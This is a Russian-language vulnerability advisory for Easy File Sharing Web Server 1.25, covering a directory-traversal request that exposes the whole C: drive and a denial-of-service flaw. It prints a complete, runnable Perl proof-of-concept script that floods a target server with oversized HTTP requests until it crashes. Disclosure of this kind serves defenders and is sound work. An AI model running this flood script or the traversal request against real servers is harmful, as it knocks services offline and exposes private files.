| Дата публикации: | 26.08.2004 |
| Всего просмотров: | 1381 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2004-1743 CVE-2004-1744 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Раскрытие важных данных Раскрытие системных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Easy File Sharing Web Server 1.x |
| Уязвимые версии: Easy File Sharing Web Server 1.25
Описание: Несколько уязвимостей обнаружено в Easy File Sharing Web Server. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может также вызвать отказ в обслуживании. Удаленный пользователь может представить специально обработанный запрос для виртуального имени директории для локального диска с:, чтобы просмотреть содержание всего диска. Пример: http://[target]/disk_cТакже сообщается, что удаленный пользователь может представить несколько больших HTTP запросов, чтобы заставить систему использовать 100 CPU. Пример/Эксплоит:
#!/usr/bin/perl
#####################################################
# Easy File Sharing Webserver v1.25 Denial Of Service
# Proof Of Concept Code By GulfTech Security Research
#####################################################
# Easy File Sharing Webserver v1.25 will consume 99%
# of CPU usage until it crashes when sent large req's
#####################################################
use IO::Socket;
print "=====================================================\n".
" Easy File Sharing Webserver v1.25 Denial Of Service \n".
"=====================================================\n";
unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }
my $remote_host = $ARGV[0];
my $remote_port = $ARGV[1];
my $done = "\015\012\015\012";
my $buff = "A" x 1000000;
my $requested = $buff.$done;
print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n";
while ($requested) {
for (my $i=1; $i<10; $i++) {
my $i = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $remote_host,
PeerPort => $remote_port,
Timeout => '10000',
Type => SOCK_STREAM,
) || die("[*] The Server Has Been Killed!");
print $i $requested;
$i->autoflush(1);
}
}
close $remote;
URL производителя: http://www.sharing-file.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |